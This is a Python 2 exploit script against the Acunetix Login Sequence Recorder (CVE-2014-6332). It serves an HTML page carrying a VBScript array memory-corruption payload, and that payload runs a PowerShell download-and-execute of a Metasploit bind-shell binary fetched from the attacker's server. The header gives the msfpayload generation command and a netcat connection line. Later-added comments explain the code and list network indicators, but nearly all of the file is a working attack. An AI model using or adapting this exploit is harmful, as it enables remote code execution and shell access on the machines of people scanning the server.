#!/usr/bin/python
import BaseHTTPServer, sys, socket
##
# Acunetix OLE Automation Array Remote Code Execution
#
# Author: Naser Farhadi
# Linkedin: http://ir.linkedin.com/pub/naser-farhadi/85/b3b/909
#
# Date: 27 Mar 2015 # Version: <=9.5 # Tested on: Windows 7
# Description: Acunetix Login Sequence Recorder (lsr.exe) uses the CoCreateInstance API from Ole32.dll to record
# the target login sequence.
# Exploit based on MS14-064 CVE-2014-6332 http://www.exploit-db.com/exploits/35229/
# This Python script starts a sample HTTP server on your machine and serves the exploit code and a
# Metasploit windows/shell_bind_tcp executable payload;
# finally you can connect to the victim machine using Netcat.
# Usage:
# chmod +x acunetix.py
# ./acunetix.py
# The attacker tries to record the login sequence of your HTTP server via Acunetix
# nc 192.168.1.7 333
# Payload generated by this command: msfpayload windows/shell_bind_tcp LPORT=333 X > acunetix.exe
#
# Video: https://vid.me/SRCb
##

class RequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
    """Request handler for the proof-of-concept HTTP server started in ``__main__``.

    The only request input it reads is ``req.path``.  Two responses exist:
    the local file ``acunetix.exe`` for the exact path ``/acunetix.exe``, and
    for every other path an HTML page whose embedded VBScript is, per the
    file header, the public MS14-064 / CVE-2014-6332 PoC.  ``req`` is the
    handler instance (conventionally named ``self``).  Python 2 only:
    ``BaseHTTPServer`` is ``http.server`` in Python 3.
    """

    def do_GET(req):
        # Status 200 is sent before the path is inspected, so every GET,
        # including one for a file that is missing on disk, starts as a success.
        req.send_response(200)
        if req.path == "/acunetix.exe":
            # Second-stage binary, read relative to the server's current
            # working directory (depends on where the script was launched).
            # No existence check: a missing file raises IOError inside the
            # handler after the 200 line has already gone out.
            # 'application/exe' is not a registered media type.
            req.send_header('Content-type', 'application/exe')
            req.end_headers()
            exe = open("acunetix.exe", 'rb')
            req.wfile.write(exe.read())
            exe.close()
        else:
            # Landing page.  The VBScript block is a fixed literal; the only
            # part built at runtime is the download URL, which embeds the IP
            # the server's own hostname resolves to, so the client must be able
            # to reach the server under that address for the second stage.
            # Detection note: a text/html body containing a VBScript block that
            # launches powershell with DownloadFile/ShellExecute, followed by a
            # GET for /acunetix.exe, are the observable network indicators of
            # this PoC.
            req.send_header('Content-type', 'text/html')
            req.end_headers()
            req.wfile.write("""Please scan me!
<SCRIPT LANGUAGE="VBScript">
function runmumaa()
On Error Resume Next
set shell=createobject("Shell.Application")
command="Invoke-Expression $(New-Object System.Net.WebClient).DownloadFile('http://"""+socket.gethostbyname(socket.gethostname())+"""/acunetix.exe',\
'acunetix.exe');$(New-Object -com Shell.Application).ShellExecute('acunetix.exe');"
shell.ShellExecute "powershell", "-Command " & command, "", "runas", 0
end function

dim aa()
dim ab()
dim a0
dim a1
dim a2
dim a3
dim win9x
dim intVersion
dim rnda
dim funclass
dim myarray

Begin()

function Begin()
On Error Resume Next
info=Navigator.UserAgent

if(instr(info,"Win64")>0) then
exit function
end if

if (instr(info,"MSIE")>0) then
intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2))
else
exit function

end if

win9x=0

BeginInit()
If Create()=True Then
myarray= chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)
myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)

if(intVersion<4) then
document.write("<br> IE")
document.write(intVersion)
runshellcode()
else
setnotsafemode()
end if
end if
end function

function BeginInit()
Randomize()
redim aa(5)
redim ab(5)
a0=13+17*rnd(6)
a3=7+3*rnd(5)
end function

function Create()
On Error Resume Next
dim i
Create=False
For i = 0 To 400
If Over()=True Then
' document.write(i)
Create=True
Exit For
End If
Next
end function

sub testaa()
end sub

function mydata()
On Error Resume Next
i=testaa
i=null
redim Preserve aa(a2)

ab(0)=0
aa(a1)=i
ab(0)=6.36598737437801E-314

aa(a1+2)=myarray
ab(2)=1.74088534731324E-310
mydata=aa(a1)
redim Preserve aa(a0)
end function


function setnotsafemode()
On Error Resume Next
i=mydata()
i=readmemo(i+8)
i=readmemo(i+16)
j=readmemo(i+&h134)
for k=0 to &h60 step 4
j=readmemo(i+&h120+k)
if(j=14) then
j=0
redim Preserve aa(a2)
aa(a1+2)(i+&h11c+k)=ab(4)
redim Preserve aa(a0)

j=0
j=readmemo(i+&h120+k)

Exit for
end if

next
ab(2)=1.69759663316747E-313
runmumaa()
end function

function Over()
On Error Resume Next
dim type1,type2,type3
Over=False
a0=a0+a3
a1=a0+2
a2=a0+&h8000000

redim Preserve aa(a0)
redim ab(a0)

redim Preserve aa(a2)

type1=1
ab(0)=1.123456789012345678901234567890
aa(a0)=10

If(IsObject(aa(a1-1)) = False) Then
if(intVersion<4) then
mem=cint(a0+1)*16
j=vartype(aa(a1-1))
if((j=mem+4) or (j*8=mem+8)) then
if(vartype(aa(a1-1))<>0) Then
If(IsObject(aa(a1)) = False ) Then
type1=VarType(aa(a1))
end if
end if
else
redim Preserve aa(a0)
exit function

end if
else
if(vartype(aa(a1-1))<>0) Then
If(IsObject(aa(a1)) = False ) Then
type1=VarType(aa(a1))
end if
end if
end if
end if


If(type1=&h2f66) Then
Over=True
End If
If(type1=&hB9AD) Then
Over=True
win9x=1
End If

redim Preserve aa(a0)

end function

function ReadMemo(add)
On Error Resume Next
redim Preserve aa(a2)

ab(0)=0
aa(a1)=add+4
ab(0)=1.69759663316747E-313
ReadMemo=lenb(aa(a1))

ab(0)=0

redim Preserve aa(a0)
end function

</script>""")
if __name__ == '__main__':
    # Bind to whatever IP the local hostname resolves to, on port 80.  Port 80
    # is privileged on Unix-like systems, so this typically fails with
    # socket.error unless run with sufficient rights.  If the hostname maps to
    # a loopback address in /etc/hosts, the server binds there and is not
    # reachable from the network; the same resolution is repeated in the
    # handler's page and in the print below, so all three agree.
    # Python 2 only (print statement, BaseHTTPServer module).
    sclass = BaseHTTPServer.HTTPServer
    server = sclass((socket.gethostbyname(socket.gethostname()), 80), RequestHandler)
    print "Http server started", socket.gethostbyname(socket.gethostname()), 80
    try:
        server.serve_forever()
    except KeyboardInterrupt:
        # Ctrl-C is the only handled way to stop; any other exception
        # propagates and skips server_close().
        pass
    server.server_close()